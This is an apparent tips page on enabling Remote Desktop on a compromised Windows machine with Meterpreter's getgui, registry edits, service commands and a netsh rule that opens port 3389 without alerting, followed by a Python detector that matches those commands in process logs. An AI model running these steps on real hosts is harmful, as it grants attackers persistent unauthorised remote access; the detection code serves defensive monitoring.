Enable RDP with Metasploit
meterpreter > run getgui -u username -p password
Enable RDP with Telnet or CMD
- Open Telnet or a Command Prompt with administrative rights.
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- This step is not finished yet: we need to start the Terminal Service, because the Terminal Service was disabled by default.
sc config TermService start= auto
This command makes the Terminal Service start every time the computer starts.
- Now we need to start the Terminal Service for immediate use, because the command in step 4 only makes the service start at every boot and does not start it now.
net start Termservice
- We are almost done. Next we need to open the port used by Remote Desktop on the firewall, so that no alert pops up when someone connects to the Remote Desktop server.
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
The commands above make the firewall accept, without an alert, every packet that arrives on port 3389, which is used for Remote Desktop.
- Open a new terminal (Backtrack 5), or use the Remote Desktop client in Windows (Start –> All Programs –> Accessories –> Remote Desktop Connection). In this tips and tricks article I will use rdesktop in Backtrack 5 R2.
rdesktop 192.168.8.92
- A GUI (Graphical User Interface) will pop up asking for a user name and password.
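
The registry, service and firewall commands above leave a recognisable sequence in process-creation logs, which a defender can match per host. The following is an added example, not part of the original page: the log layout, host names, timestamps and the one-line netsh form are constructed assumptions.

```python
import re
from collections import defaultdict

# Case-insensitive patterns for the commands shown in this walkthrough.
RULES = {
    "reg_allow_ts": re.compile(
        r"\breg(\.exe)?\s+add\b.*Terminal Server.*AllowTSConnections.*/d\s+(0x)?0*1\b", re.I),
    "reg_undeny_ts": re.compile(
        r"\breg(\.exe)?\s+add\b.*Terminal Server.*fDenyTSConnections.*/d\s+(0x)?0+\b", re.I),
    "svc_autostart": re.compile(
        r"\bsc(\.exe)?\s+config\s+TermService\s+start=\s*auto\b", re.I),
    "svc_start": re.compile(r"\bnet1?(\.exe)?\s+start\s+TermService\b", re.I),
    # Only visible when netsh is run as a one-liner; an interactive netsh
    # session leaves just "netsh.exe" on the process command line.
    "fw_open_3389": re.compile(
        r"\bnetsh(\.exe)?\s+firewall\s+add\s+portopening\s+TCP\s+3389\b", re.I),
}
# Assumed (constructed) log layout: <timestamp> host=<h> user=<u> cmd=<command line>
LINE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

def scan(lines):
    """Return {host: [(timestamp, user, rule_name), ...]} for matching command lines."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not in the assumed layout
        for name, rx in RULES.items():
            if rx.search(m["cmd"]):
                hits[m["host"]].append((m["ts"], m["user"], name))
    return dict(hits)

def rdp_enablement_hosts(hits, min_stages=3):
    """Hosts where at least min_stages distinct steps of the sequence were seen."""
    return sorted(h for h, ev in hits.items() if len({e[2] for e in ev}) >= min_stages)

# Constructed sample process-creation records (not real telemetry).
TS_KEY = r'"hklm\system\currentControlSet\Control\Terminal Server"'
SAMPLE = [
    f"2024-05-01T10:00:01Z host=WS01 user=admin cmd=reg add {TS_KEY} /v fDenyTSConnections /t REG_DWORD /d 0x0 /f",
    "2024-05-01T10:00:05Z host=WS01 user=admin cmd=sc config TermService start= auto",
    "2024-05-01T10:00:09Z host=WS01 user=admin cmd=net start Termservice",
    f"2024-05-01T11:30:00Z host=WS02 user=helpdesk cmd=reg add {TS_KEY} /v fDenyTSConnections /t REG_DWORD /d 0x1 /f",
    "2024-05-01T12:00:00Z host=WS03 user=svc cmd=net start TermService",
]

if __name__ == "__main__":
    found = scan(SAMPLE)
    for host in rdp_enablement_hosts(found):
        print(host, [rule for _, _, rule in found[host]])
```

Because the firewall step on this page is typed into an interactive netsh session, command-line logging alone will miss it; pair this with monitoring of the fDenyTSConnections registry value and the firewall exception list.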